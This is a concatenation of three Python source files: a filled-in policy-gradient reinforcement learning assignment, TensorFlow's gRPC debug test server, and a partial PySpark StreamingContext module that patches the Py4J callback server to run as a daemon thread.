pathlength(path) if timesteps_this_batch > self.min_timesteps_per_batch: break return paths, timesteps_this_batch def sample_trajectory(self, env, animate_this_episode): ob = env.reset() obs, acs, rewards = [], [], [] steps = 0 while True: if animate_this_episode: env.render() time.sleep(0.1) 
obs.append(ob) #====================================================================================# # ----------PROBLEM 3---------- #====================================================================================# # YOUR CODE HERE ac = self.sess.run(self.sy_sampled_ac, feed_dict={self.sy_ob_no: ob.reshape(1, -1)}) ac = ac[0] acs.append(ac) ob, rew, done, _ = env.step(ac) rewards.append(rew) steps += 1 if done or steps > self.max_path_length: break path = {"observation" : np.array(obs, dtype=np.float32), "reward" : np.array(rewards, dtype=np.float32), "action" : np.array(acs, dtype=np.float32)} return path #====================================================================================# # ----------PROBLEM 3---------- #====================================================================================# def sum_of_rewards(self, re_n): """ Monte Carlo estimation of the Q function. let sum_of_path_lengths be the sum of the lengths of the paths sampled from Agent.sample_trajectories let num_paths be the number of paths sampled from Agent.sample_trajectories arguments: re_n: length: num_paths. Each element in re_n is a numpy array containing the rewards for the particular path returns: q_n: shape: (sum_of_path_lengths). A single vector for the estimated q values whose length is the sum of the lengths of the paths ---------------------------------------------------------------------------------- Your code should construct numpy arrays for Q-values which will be used to compute advantages (which will in turn be fed to the placeholder you defined in Agent.define_placeholders). Recall that the expression for the policy gradient PG is PG = E_{tau} [sum_{t=0}^T grad log pi(a_t|s_t) * (Q_t - b_t )] where tau=(s_0, a_0, ...) is a trajectory, Q_t is the Q-value at time t, Q^{pi}(s_t, a_t), and b_t is a baseline which may depend on s_t. 
You will write code for two cases, controlled by the flag 'reward_to_go': Case 1: trajectory-based PG (reward_to_go = False) Instead of Q^{pi}(s_t, a_t), we use the total discounted reward summed over entire trajectory (regardless of which time step the Q-value should be for). For this case, the policy gradient estimator is E_{tau} [sum_{t=0}^T grad log pi(a_t|s_t) * Ret(tau)] where Ret(tau) = sum_{t'=0}^T gamma^t' r_{t'}. Thus, you should compute Q_t = Ret(tau) Case 2: reward-to-go PG (reward_to_go = True) Here, you estimate Q^{pi}(s_t, a_t) by the discounted sum of rewards starting from time step t. Thus, you should compute Q_t = sum_{t'=t}^T gamma^(t'-t) * r_{t'} Store the Q-values for all timesteps and all trajectories in a variable 'q_n', like the 'ob_no' and 'ac_na' above. """ # YOUR_CODE_HERE num_paths = len(re_n) sum_of_path_lengths = sum(len(r) for r in re_n) q_n = np.empty(sum_of_path_lengths) i = 0 for r in re_n: l = len(r) q_n[i + l - 1] = r[-1] for j in range(l - 2, -1, -1): q_n[i + j] = r[j] + self.gamma * q_n[i + j + 1] i += l if not self.reward_to_go: i = 0 for r in re_n: l = len(r) q_n[i:i + l] = q_n[i] i += l return q_n def compute_advantage(self, ob_no, q_n): """ Computes advantages by (possibly) subtracting a baseline from the estimated Q values let sum_of_path_lengths be the sum of the lengths of the paths sampled from Agent.sample_trajectories let num_paths be the number of paths sampled from Agent.sample_trajectories arguments: ob_no: shape: (sum_of_path_lengths, ob_dim) q_n: shape: (sum_of_path_lengths). A single vector for the estimated q values whose length is the sum of the lengths of the paths returns: adv_n: shape: (sum_of_path_lengths). 
A single vector for the estimated advantages whose length is the sum of the lengths of the paths """ #====================================================================================# # ----------PROBLEM 6---------- # Computing Baselines #====================================================================================# if self.nn_baseline: # If nn_baseline is True, use your neural network to predict reward-to-go # at each timestep for each trajectory, and save the result in a variable 'b_n' # like 'ob_no', 'ac_na', and 'q_n'. # # Hint #bl1: rescale the output from the nn_baseline to match the statistics # (mean and std) of the current batch of Q-values. (Goes with Hint # #bl2 in Agent.update_parameters. # YOUR CODE HERE b_n = self.sess.run(self.baseline_prediction, feed_dict={self.sy_ob_no:ob_no}) b_n = normalize(b_n, q_n.mean(), q_n.std()) adv_n = q_n - b_n else: adv_n = q_n.copy() return adv_n def estimate_return(self, ob_no, re_n): """ Estimates the returns over a set of trajectories. let sum_of_path_lengths be the sum of the lengths of the paths sampled from Agent.sample_trajectories let num_paths be the number of paths sampled from Agent.sample_trajectories arguments: ob_no: shape: (sum_of_path_lengths, ob_dim) re_n: length: num_paths. Each element in re_n is a numpy array containing the rewards for the particular path returns: q_n: shape: (sum_of_path_lengths). A single vector for the estimated q values whose length is the sum of the lengths of the paths adv_n: shape: (sum_of_path_lengths). 
A single vector for the estimated advantages whose length is the sum of the lengths of the paths """ q_n = self.sum_of_rewards(re_n) adv_n = self.compute_advantage(ob_no, q_n) #====================================================================================# # ----------PROBLEM 3---------- # Advantage Normalization #====================================================================================# if self.normalize_advantages: # On the next line, implement a trick which is known empirically to reduce variance # in policy gradient methods: normalize adv_n to have mean zero and std=1. # YOUR_CODE_HERE adv_n = normalize(adv_n) return q_n, adv_n def update_parameters(self, ob_no, ac_na, q_n, adv_n): """ Update the parameters of the policy and (possibly) the neural network baseline, which is trained to approximate the value function. arguments: ob_no: shape: (sum_of_path_lengths, ob_dim) ac_na: shape: (sum_of_path_lengths). q_n: shape: (sum_of_path_lengths). A single vector for the estimated q values whose length is the sum of the lengths of the paths adv_n: shape: (sum_of_path_lengths). A single vector for the estimated advantages whose length is the sum of the lengths of the paths returns: nothing """ #====================================================================================# # ----------PROBLEM 6---------- # Optimizing Neural Network Baseline #====================================================================================# if self.nn_baseline: # If a neural network baseline is used, set up the targets and the inputs for the # baseline. # # Fit it to the current batch in order to use for the next iteration. Use the # baseline_update_op you defined earlier. # # Hint #bl2: Instead of trying to target raw Q-values directly, rescale the # targets to have mean zero and std=1. (Goes with Hint #bl1 in # Agent.compute_advantage.) 
# YOUR_CODE_HERE target_n = normalize(q_n) _ = self.sess.run(self.baseline_update_op, feed_dict={ self.sy_ob_no:ob_no, self.sy_target_n:target_n }) #====================================================================================# # ----------PROBLEM 3---------- # Performing the Policy Update #====================================================================================# # Call the update operation necessary to perform the policy gradient update based on # the current batch of rollouts. # # For debug purposes, you may wish to save the value of the loss function before # and after an update, and then log them below. # YOUR_CODE_HERE for i in range(self.pg_step): _ = self.sess.run(self.update_op, feed_dict={ self.sy_ob_no:ob_no, self.sy_ac_na:ac_na, self.sy_adv_n:adv_n }) def train_PG( exp_name, env_name, n_iter, gamma, min_timesteps_per_batch, max_path_length, learning_rate, reward_to_go, animate, logdir, normalize_advantages, nn_baseline, seed, n_layers, size, pg_step): start = time.time() #========================================================================================# # Set Up Logger #========================================================================================# setup_logger(logdir, locals()) #========================================================================================# # Set Up Env #========================================================================================# # Make the gym environment env = gym.make(env_name) # Set random seeds tf.set_random_seed(seed) np.random.seed(seed) env.seed(seed) # Maximum length for episodes max_path_length = max_path_length or env.spec.max_episode_steps # Is this env continuous, or self.discrete? 
discrete = isinstance(env.action_space, gym.spaces.Discrete) # Observation and action sizes ob_dim = env.observation_space.shape[0] ac_dim = env.action_space.n if discrete else env.action_space.shape[0] #========================================================================================# # Initialize Agent #========================================================================================# computation_graph_args = { 'n_layers': n_layers, 'ob_dim': ob_dim, 'ac_dim': ac_dim, 'discrete': discrete, 'size': size, 'learning_rate': learning_rate, 'pg_step': pg_step } sample_trajectory_args = { 'animate': animate, 'max_path_length': max_path_length, 'min_timesteps_per_batch': min_timesteps_per_batch, } estimate_return_args = { 'gamma': gamma, 'reward_to_go': reward_to_go, 'nn_baseline': nn_baseline, 'normalize_advantages': normalize_advantages, } agent = Agent(computation_graph_args, sample_trajectory_args, estimate_return_args) # build computation graph agent.build_computation_graph() # tensorflow: config, session, variable initialization agent.init_tf_sess() #========================================================================================# # Training Loop #========================================================================================# total_timesteps = 0 for itr in range(n_iter): print("********** Iteration %i ************"%itr) paths, timesteps_this_batch = agent.sample_trajectories(itr, env) total_timesteps += timesteps_this_batch # Build arrays for observation, action for the policy gradient update by concatenating # across paths ob_no = np.concatenate([path["observation"] for path in paths]) ac_na = np.concatenate([path["action"] for path in paths]) re_n = [path["reward"] for path in paths] q_n, adv_n = agent.estimate_return(ob_no, re_n) agent.update_parameters(ob_no, ac_na, q_n, adv_n) # Log diagnostics returns = [path["reward"].sum() for path in paths] ep_lengths = [pathlength(path) for path in paths] logz.log_tabular("Time", 
time.time() - start) logz.log_tabular("Iteration", itr) logz.log_tabular("AverageReturn", np.mean(returns)) logz.log_tabular("StdReturn", np.std(returns)) logz.log_tabular("MaxReturn", np.max(returns)) logz.log_tabular("MinReturn", np.min(returns)) logz.log_tabular("EpLenMean", np.mean(ep_lengths)) logz.log_tabular("EpLenStd", np.std(ep_lengths)) logz.log_tabular("TimestepsThisBatch", timesteps_this_batch) logz.log_tabular("TimestepsSoFar", total_timesteps) logz.dump_tabular() logz.pickle_tf_vars() def main(): import argparse parser = argparse.ArgumentParser() parser.add_argument('env_name', type=str) parser.add_argument('--exp_name', type=str, default='vpg') parser.add_argument('--no_time', '-nt', action='store_true') parser.add_argument('--render', action='store_true') parser.add_argument('--discount', type=float, default=1.0) parser.add_argument('--n_iter', '-n', type=int, default=100) parser.add_argument('--batch_size', '-b', type=int, default=1000) parser.add_argument('--ep_len', '-ep', type=float, default=-1.) 
parser.add_argument('--learning_rate', '-lr', type=float, default=5e-3) parser.add_argument('--reward_to_go', '-rtg', action='store_true') parser.add_argument('--dont_normalize_advantages', '-dna', action='store_true') parser.add_argument('--nn_baseline', '-bl', action='store_true') parser.add_argument('--seed', type=int, default=1) parser.add_argument('--n_experiments', '-e', type=int, default=1) parser.add_argument('--n_layers', '-l', type=int, default=2) parser.add_argument('--size', '-s', type=int, default=64) parser.add_argument('--pg_step', '-ps', type=int, default=1) parser.add_argument('--gpu', type=int, default=0) args = parser.parse_args() os.environ["CUDA_VISIBLE_DEVICES"] = str(args.gpu) if not(os.path.exists('data')): os.makedirs('data') logdir = args.exp_name + '_' + args.env_name if not args.no_time: logdir = logdir + '_' + time.strftime("%d-%m-%Y_%H-%M-%S") logdir = os.path.join('data', logdir) if not(os.path.exists(logdir)): os.makedirs(logdir) max_path_length = args.ep_len if args.ep_len > 0 else None processes = [] for e in range(args.n_experiments): seed = args.seed + 10*e print('Running experiment with seed %d'%seed) def train_func(): train_PG( exp_name=args.exp_name, env_name=args.env_name, n_iter=args.n_iter, gamma=args.discount, min_timesteps_per_batch=args.batch_size, max_path_length=max_path_length, learning_rate=args.learning_rate, reward_to_go=args.reward_to_go, animate=args.render, logdir=os.path.join(logdir,'%d'%seed), normalize_advantages=not(args.dont_normalize_advantages), nn_baseline=args.nn_baseline, seed=seed, n_layers=args.n_layers, size=args.size, pg_step=args.pg_step ) # # Awkward hacky process runs, because Tensorflow does not like # # repeatedly calling train_PG in the same thread. p = Process(target=train_func, args=tuple()) p.start() processes.append(p) # if you comment in the line below, then the loop will block # until this process finishes # p.join() for p in processes: p.join() if __name__ == "__main__": main()
# ===== file: grpc_debug_test_server.py =====
# Copyright 2016 The TensorFlow Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== """GRPC debug server for testing.""" from __future__ import absolute_import from __future__ import division from __future__ import print_function import collections import errno import functools import hashlib import json import os import re import shutil import tempfile import threading import time import portpicker from tensorflow.core.debug import debug_service_pb2 from tensorflow.core.protobuf import config_pb2 from tensorflow.core.util import event_pb2 from tensorflow.python.client import session from tensorflow.python.debug.lib import debug_data from tensorflow.python.debug.lib import debug_utils from tensorflow.python.debug.lib import grpc_debug_server from tensorflow.python.framework import constant_op from tensorflow.python.framework import errors from tensorflow.python.ops import variables from tensorflow.python.util import compat def _get_dump_file_path(dump_root, device_name, debug_node_name): """Get the file path of the dump file for a debug node. Args: dump_root: (str) Root dump directory. device_name: (str) Name of the device that the debug node resides on. debug_node_name: (str) Name of the debug node, e.g., cross_entropy/Log:0:DebugIdentity. Returns: (str) Full path of the dump file. 
""" dump_root = os.path.join( dump_root, debug_data.device_name_to_device_path(device_name)) if "/" in debug_node_name: dump_dir = os.path.join(dump_root, os.path.dirname(debug_node_name)) dump_file_name = re.sub(":", "_", os.path.basename(debug_node_name)) else: dump_dir = dump_root dump_file_name = re.sub(":", "_", debug_node_name) now_microsec = int(round(time.time() * 1000 * 1000)) dump_file_name += "_%d" % now_microsec return os.path.join(dump_dir, dump_file_name) class EventListenerTestStreamHandler( grpc_debug_server.EventListenerBaseStreamHandler): """Implementation of EventListenerBaseStreamHandler that dumps to file.""" def __init__(self, dump_dir, event_listener_servicer): super(EventListenerTestStreamHandler, self).__init__() self._dump_dir = dump_dir self._event_listener_servicer = event_listener_servicer if self._dump_dir: self._try_makedirs(self._dump_dir) self._grpc_path = None self._cached_graph_defs = [] self._cached_graph_def_device_names = [] self._cached_graph_def_wall_times = [] def on_core_metadata_event(self, event): self._event_listener_servicer.toggle_watch() core_metadata = json.loads(event.log_message.message) if not self._grpc_path: grpc_path = core_metadata["grpc_path"] if grpc_path: if grpc_path.startswith("/"): grpc_path = grpc_path[1:] if self._dump_dir: self._dump_dir = os.path.join(self._dump_dir, grpc_path) # Write cached graph defs to filesystem. for graph_def, device_name, wall_time in zip( self._cached_graph_defs, self._cached_graph_def_device_names, self._cached_graph_def_wall_times): self._write_graph_def(graph_def, device_name, wall_time) if self._dump_dir: self._write_core_metadata_event(event) else: self._event_listener_servicer.core_metadata_json_strings.append( event.log_message.message) def on_graph_def(self, graph_def, device_name, wall_time): """Implementation of the tensor value-carrying Event proto callback. Args: graph_def: A GraphDef object. device_name: Name of the device on which the graph was created. 
wall_time: An epoch timestamp (in microseconds) for the graph. """ if self._dump_dir: if self._grpc_path: self._write_graph_def(graph_def, device_name, wall_time) else: self._cached_graph_defs.append(graph_def) self._cached_graph_def_device_names.append(device_name) self._cached_graph_def_wall_times.append(wall_time) else: self._event_listener_servicer.partition_graph_defs.append(graph_def) def on_value_event(self, event): """Implementation of the tensor value-carrying Event proto callback. Writes the Event proto to the file system for testing. The path written to follows the same pattern as the file:// debug URLs of tfdbg, i.e., the name scope of the op becomes the directory structure under the dump root directory. Args: event: The Event proto carrying a tensor value. Returns: If the debug node belongs to the set of currently activated breakpoints, a `EventReply` proto will be returned. """ if self._dump_dir: self._write_value_event(event) else: value = event.summary.value[0] tensor_value = debug_data.load_tensor_from_event(event) self._event_listener_servicer.debug_tensor_values[value.node_name].append( tensor_value) items = event.summary.value[0].node_name.split(":") node_name = items[0] output_slot = int(items[1]) debug_op = items[2] if ((node_name, output_slot, debug_op) in self._event_listener_servicer.breakpoints): return debug_service_pb2.EventReply() def _try_makedirs(self, dir_path): if not os.path.isdir(dir_path): try: os.makedirs(dir_path) except OSError as error: if error.errno != errno.EEXIST: raise def _write_core_metadata_event(self, event): core_metadata_path = os.path.join( self._dump_dir, debug_data.METADATA_FILE_PREFIX + debug_data.CORE_METADATA_TAG + "_%d" % event.wall_time) self._try_makedirs(self._dump_dir) with open(core_metadata_path, "wb") as f: f.write(event.SerializeToString()) def _write_graph_def(self, graph_def, device_name, wall_time): encoded_graph_def = graph_def.SerializeToString() graph_hash = 
int(hashlib.md5(encoded_graph_def).hexdigest(), 16) event = event_pb2.Event(graph_def=encoded_graph_def, wall_time=wall_time) graph_file_path = os.path.join( self._dump_dir, debug_data.device_name_to_device_path(device_name), debug_data.METADATA_FILE_PREFIX + debug_data.GRAPH_FILE_TAG + debug_data.HASH_TAG + "%d_%d" % (graph_hash, wall_time)) self._try_makedirs(os.path.dirname(graph_file_path)) with open(graph_file_path, "wb") as f: f.write(event.SerializeToString()) def _write_value_event(self, event): value = event.summary.value[0] # Obtain the device name from the metadata. summary_metadata = event.summary.value[0].metadata if not summary_metadata.plugin_data: raise ValueError("The value lacks plugin data.") try: content = json.loads(compat.as_text(summary_metadata.plugin_data.content)) except ValueError as err: raise ValueError("Could not parse content into JSON: %r, %r" % (content, err)) device_name = content["device"] dump_full_path = _get_dump_file_path( self._dump_dir, device_name, value.node_name) self._try_makedirs(os.path.dirname(dump_full_path)) with open(dump_full_path, "wb") as f: f.write(event.SerializeToString()) class EventListenerTestServicer(grpc_debug_server.EventListenerBaseServicer): """An implementation of EventListenerBaseServicer for testing.""" def __init__(self, server_port, dump_dir, toggle_watch_on_core_metadata=None): """Constructor of EventListenerTestServicer. Args: server_port: (int) The server port number. dump_dir: (str) The root directory to which the data files will be dumped. If empty or None, the received debug data will not be dumped to the file system: they will be stored in memory instead. toggle_watch_on_core_metadata: A list of (node_name, output_slot, debug_op) tuples to toggle the watchpoint status during the on_core_metadata calls (optional). 
""" self.core_metadata_json_strings = [] self.partition_graph_defs = [] self.debug_tensor_values = collections.defaultdict(list) self._initialize_toggle_watch_state(toggle_watch_on_core_metadata) grpc_debug_server.EventListenerBaseServicer.__init__( self, server_port, functools.partial(EventListenerTestStreamHandler, dump_dir, self)) # Members for storing the graph ops traceback and source files. self._call_types = [] self._call_keys = [] self._origin_stacks = [] self._origin_id_to_strings = [] self._graph_tracebacks = [] self._graph_versions = [] self._source_files = [] def _initialize_toggle_watch_state(self, toggle_watches): self._toggle_watches = toggle_watches self._toggle_watch_state = dict() if self._toggle_watches: for watch_key in self._toggle_watches: self._toggle_watch_state[watch_key] = False def toggle_watch(self): for watch_key in self._toggle_watch_state: node_name, output_slot, debug_op = watch_key if self._toggle_watch_state[watch_key]: self.request_unwatch(node_name, output_slot, debug_op) else: self.request_watch(node_name, output_slot, debug_op) self._toggle_watch_state[watch_key] = ( not self._toggle_watch_state[watch_key]) def clear_data(self): self.core_metadata_json_strings = [] self.partition_graph_defs = [] self.debug_tensor_values = collections.defaultdict(list) self._call_types = [] self._call_keys = [] self._origin_stacks = [] self._origin_id_to_strings = [] self._graph_tracebacks = [] self._graph_versions = [] self._source_files = [] def SendTracebacks(self, request, context): self._call_types.append(request.call_type) self._call_keys.append(request.call_key) self._origin_stacks.append(request.origin_stack) self._origin_id_to_strings.append(request.origin_id_to_string) self._graph_tracebacks.append(request.graph_traceback) self._graph_versions.append(request.graph_version) return debug_service_pb2.EventReply() def SendSourceFiles(self, request, context): self._source_files.append(request) return debug_service_pb2.EventReply() def 
query_op_traceback(self, op_name): """Query the traceback of an op. Args: op_name: Name of the op to query. Returns: The traceback of the op, as a list of 3-tuples: (filename, lineno, function_name) Raises: ValueError: If the op cannot be found in the tracebacks received by the server so far. """ for op_log_proto in self._graph_tracebacks: for log_entry in op_log_proto.log_entries: if log_entry.name == op_name: return self._code_def_to_traceback(log_entry.code_def, op_log_proto.id_to_string) raise ValueError( "Op '%s' does not exist in the tracebacks received by the debug " "server." % op_name) def query_origin_stack(self): """Query the stack of the origin of the execution call. Returns: A `list` of all tracebacks. Each item corresponds to an execution call, i.e., a `SendTracebacks` request. Each item is a `list` of 3-tuples: (filename, lineno, function_name). """ ret = [] for stack, id_to_string in zip( self._origin_stacks, self._origin_id_to_strings): ret.append(self._code_def_to_traceback(stack, id_to_string)) return ret def query_call_types(self): return self._call_types def query_call_keys(self): return self._call_keys def query_graph_versions(self): return self._graph_versions def query_source_file_line(self, file_path, lineno): """Query the content of a given line in a source file. Args: file_path: Path to the source file. lineno: Line number as an `int`. Returns: Content of the line as a string. Raises: ValueError: If no source file is found at the given file_path. 
""" if not self._source_files: raise ValueError( "This debug server has not received any source file contents yet.") for source_files in self._source_files: for source_file_proto in source_files.source_files: if source_file_proto.file_path == file_path: return source_file_proto.lines[lineno - 1] raise ValueError( "Source file at path %s has not been received by the debug server", file_path) def _code_def_to_traceback(self, code_def, id_to_string): return [(id_to_string[trace.file_id], trace.lineno, id_to_string[trace.function_id]) for trace in code_def.traces] def start_server_on_separate_thread(dump_to_filesystem=True, server_start_delay_sec=0.0, poll_server=False, blocking=True, toggle_watch_on_core_metadata=None): """Create a test gRPC debug server and run on a separate thread. Args: dump_to_filesystem: (bool) whether the debug server will dump debug data to the filesystem. server_start_delay_sec: (float) amount of time (in sec) to delay the server start up for. poll_server: (bool) whether the server will be polled till success on startup. blocking: (bool) whether the server should be started in a blocking mode. toggle_watch_on_core_metadata: A list of (node_name, output_slot, debug_op) tuples to toggle the watchpoint status during the on_core_metadata calls (optional). Returns: server_port: (int) Port on which the server runs. debug_server_url: (str) grpc:// URL to the server. server_dump_dir: (str) The debug server's dump directory. server_thread: The server Thread object. server: The `EventListenerTestServicer` object. Raises: ValueError: If polling the server process for ready state is not successful within maximum polling count. 
""" server_port = portpicker.pick_unused_port() debug_server_url = "grpc://localhost:%d" % server_port server_dump_dir = tempfile.mkdtemp() if dump_to_filesystem else None server = EventListenerTestServicer( server_port=server_port, dump_dir=server_dump_dir, toggle_watch_on_core_metadata=toggle_watch_on_core_metadata) def delay_then_run_server(): time.sleep(server_start_delay_sec) server.run_server(blocking=blocking) server_thread = threading.Thread(target=delay_then_run_server) server_thread.start() if poll_server: if not _poll_server_till_success( 50, 0.2, debug_server_url, server_dump_dir, server, gpu_memory_fraction=0.1): raise ValueError( "Failed to start test gRPC debug server at port %d" % server_port) server.clear_data() return server_port, debug_server_url, server_dump_dir, server_thread, server def _poll_server_till_success(max_attempts, sleep_per_poll_sec, debug_server_url, dump_dir, server, gpu_memory_fraction=1.0): """Poll server until success or exceeding max polling count. Args: max_attempts: (int) How many times to poll at maximum sleep_per_poll_sec: (float) How many seconds to sleep for after each unsuccessful poll. debug_server_url: (str) gRPC URL to the debug server. dump_dir: (str) Dump directory to look for files in. If None, will directly check data from the server object. server: The server object. gpu_memory_fraction: (float) Fraction of GPU memory to be allocated for the Session used in server polling. Returns: (bool) Whether the polling succeeded within max_polls attempts. 
""" poll_count = 0 config = config_pb2.ConfigProto(gpu_options=config_pb2.GPUOptions( per_process_gpu_memory_fraction=gpu_memory_fraction)) with session.Session(config=config) as sess: for poll_count in range(max_attempts): server.clear_data() print("Polling: poll_count = %d" % poll_count) x_init_name = "x_init_%d" % poll_count x_init = constant_op.constant([42.0], shape=[1], name=x_init_name) x = variables.Variable(x_init, name=x_init_name) run_options = config_pb2.RunOptions() debug_utils.add_debug_tensor_watch( run_options, x_init_name, 0, debug_urls=[debug_server_url]) try: sess.run(x.initializer, options=run_options) except errors.FailedPreconditionError: pass if dump_dir: if os.path.isdir( dump_dir) and debug_data.DebugDumpDir(dump_dir).size > 0: shutil.rmtree(dump_dir) print("Poll succeeded.") return True else: print("Poll failed. Sleeping for %f s" % sleep_per_poll_sec) time.sleep(sleep_per_poll_sec) else: if server.debug_tensor_values: print("Poll succeeded.") return True else: print("Poll failed. Sleeping for %f s" % sleep_per_poll_sec) time.sleep(sleep_per_poll_sec) return False
context.py
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements.  See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License.  You may obtain a copy of the License at
#
#    http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#

from __future__ import print_function

import os
import sys

from py4j.java_gateway import java_import, JavaObject

from pyspark import RDD, SparkConf
from pyspark.serializers import NoOpSerializer, UTF8Deserializer, CloudPickleSerializer
from pyspark.context import SparkContext
from pyspark.storagelevel import StorageLevel
from pyspark.streaming.dstream import DStream
from pyspark.streaming.util import TransformFunction, TransformFunctionSerializer

__all__ = ["StreamingContext"]


def _daemonize_callback_server():
    """
    Hack Py4J to daemonize callback server

    The thread of callback server has daemon=False, it will block the driver
    from exiting if it's not shutdown. The following code replace `start()`
    of CallbackServer with a new version, which set daemon=True for this
    thread.

    Also, it will update the port number (0) with real port
    """
    # TODO: create a patch for Py4J
    import socket
    import py4j.java_gateway
    logger = py4j.java_gateway.logger
    from py4j.java_gateway import Py4JNetworkError
    from threading import Thread

    def start(self):
        """Starts the CallbackServer. This method should be called by the
        client instead of run()."""
        # Replacement implementation: identical to Py4J's original except the
        # serving thread is created with daemon=True (see module note above).
        self.server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        try:
            self.server_socket.bind((self.address, self.port))
            if not self.port:
                # update port with real port chosen by the OS for port 0
                self.port = self.server_socket.getsockname()[1]
        except Exception as e:
            msg = 'An error occurred while trying to start the callback server: %s' % e
            logger.exception(msg)
            raise Py4JNetworkError(msg)

        # Maybe thread needs to be cleanup up?
        self.thread = Thread(target=self.run)
        self.thread.daemon = True
        self.thread.start()

    # Monkey-patch the class so every CallbackServer created afterwards uses
    # the daemonized start().
    py4j.java_gateway.CallbackServer.start = start


class StreamingContext(object):
    """
    Main entry point for Spark Streaming functionality. A StreamingContext
    represents the connection to a Spark cluster, and can be used to create
    L{DStream} various input sources. It can be from an existing
    L{SparkContext}.
    After creating and transforming DStreams, the streaming computation can
    be started and stopped using `context.start()` and `context.stop()`,
    respectively. `context.awaitTermination()` allows the current thread to
    wait for the termination of the context by `stop()` or by an exception.
    """
    # Serializer shared by all contexts; set up lazily in _ensure_initialized.
    _transformerSerializer = None

    # Reference to a currently active StreamingContext
    _activeContext = None

    def __init__(self, sparkContext, batchDuration=None, jssc=None):
        """
        Create a new StreamingContext.

        @param sparkContext: L{SparkContext} object.
        @param batchDuration: the time interval (in seconds) at which streaming
                              data will be divided into batches
        """
        self._sc = sparkContext
        self._jvm = self._sc._jvm
        # Reuse an existing Java context (checkpoint recovery) or create one.
        self._jssc = jssc or self._initialize_context(self._sc, batchDuration)

    def _initialize_context(self, sc, duration):
        # Create the JVM-side JavaStreamingContext backing this object.
        self._ensure_initialized()
        return self._jvm.JavaStreamingContext(sc._jsc, self._jduration(duration))

    def _jduration(self, seconds):
        """
        Create Duration object given number of seconds
        """
        # Java-side Duration is in milliseconds.
        return self._jvm.Duration(int(seconds * 1000))

    @classmethod
    def _ensure_initialized(cls):
        # One-time JVM gateway setup: imports, callback server, serializer.
        SparkContext._ensure_initialized()
        gw = SparkContext._gateway

        java_import(gw.jvm, "org.apache.spark.streaming.*")
        java_import(gw.jvm, "org.apache.spark.streaming.api.java.*")
        java_import(gw.jvm, "org.apache.spark.streaming.api.python.*")

        # start callback server
        # getattr will fallback to JVM, so we cannot test by hasattr()
        if "_callback_server" not in gw.__dict__:
            _daemonize_callback_server()
            # use random port
            gw._start_callback_server(0)
            # gateway with real port
            gw._python_proxy_port = gw._callback_server.port
            # get the GatewayServer object in JVM by ID
            jgws = JavaObject("GATEWAY_SERVER", gw._gateway_client)
            # update the port of CallbackClient with real port
            gw.jvm.PythonDStream.updatePythonGatewayPort(jgws, gw._python_proxy_port)

        # register serializer for TransformFunction
        # it happens before creating SparkContext when loading from checkpointing
        cls._transformerSerializer = TransformFunctionSerializer(
            SparkContext._active_spark_context, CloudPickleSerializer(), gw)

    @classmethod
    def getOrCreate(cls, checkpointPath, setupFunc):
        """
        Either recreate a StreamingContext from checkpoint data or create a new
        StreamingContext. If checkpoint data exists in the provided
        `checkpointPath`, then StreamingContext will be recreated from the
        checkpoint data. If the data does not exist, then the provided
        setupFunc will be used to create a new context.

        @param checkpointPath: Checkpoint directory used in an earlier streaming program
        @param setupFunc: Function to create a new context and setup DStreams
        """
        # TODO: support checkpoint in HDFS
        # NOTE(review): os.path only checks the local filesystem, so a
        # checkpoint stored in HDFS is treated as absent here.
        if not os.path.exists(checkpointPath) or not os.listdir(checkpointPath):
            ssc = setupFunc()
            ssc.checkpoint(checkpointPath)
            return ssc

        cls._ensure_initialized()
        gw = SparkContext._gateway

        try:
            jssc = gw.jvm.JavaStreamingContext(checkpointPath)
        except Exception:
            print("failed to load StreamingContext from checkpoint", file=sys.stderr)
            raise

        jsc = jssc.sparkContext()
        conf = SparkConf(_jconf=jsc.getConf())
        sc = SparkContext(conf=conf, gateway=gw, jsc=jsc)
        # update ctx in serializer
        SparkContext._active_spark_context = sc
        cls._transformerSerializer.ctx = sc
        return StreamingContext(sc, None, jssc)

    @classmethod
    def getActive(cls):
        """
        Return either the currently active StreamingContext (i.e., if there is
        a context started but not stopped) or None.
        """
        activePythonContext = cls._activeContext
        if activePythonContext is not None:
            # Verify that the current running Java StreamingContext is active and is the same one
            # backing the supposedly active Python context
            activePythonContextJavaId = activePythonContext._jssc.ssc().hashCode()
            activeJvmContextOption = activePythonContext._jvm.StreamingContext.getActive()

            if activeJvmContextOption.isEmpty():
                cls._activeContext = None
            elif activeJvmContextOption.get().hashCode() != activePythonContextJavaId:
                cls._activeContext = None
                # NOTE(review): "action" in this message should read "active";
                # left unchanged because it is a runtime string.
                raise Exception("JVM's active JavaStreamingContext is not the JavaStreamingContext "
                                "backing the action Python StreamingContext. This is unexpected.")
        return cls._activeContext

    @classmethod
    def getActiveOrCreate(cls, checkpointPath, setupFunc):
        """
        Either return the active StreamingContext (i.e. currently started but
        not stopped), or recreate a StreamingContext from checkpoint data or
        create a new StreamingContext using the provided setupFunc function.
        If the checkpointPath is None or does not contain valid checkpoint
        data, then setupFunc will be called to create a new context and setup
        DStreams.

        @param checkpointPath: Checkpoint directory used in an earlier streaming program. Can be
        None if the intention is to always create a new context when there is no active context.
        @param setupFunc: Function to create a new JavaStreamingContext and setup DStreams
        """
        if setupFunc is None:
            raise Exception("setupFunc cannot be None")
        activeContext = cls.getActive()
        if activeContext is not None:
            return activeContext
        elif checkpointPath is not None:
            return cls.getOrCreate(checkpointPath, setupFunc)
        else:
            return setupFunc()

    @property
    def sparkContext(self):
        """
        Return SparkContext which is associated with this StreamingContext.
        """
        return self._sc

    def start(self):
        """
        Start the execution of the streams.
        """
        self._jssc.start()
        # Record this context as the active one for getActive().
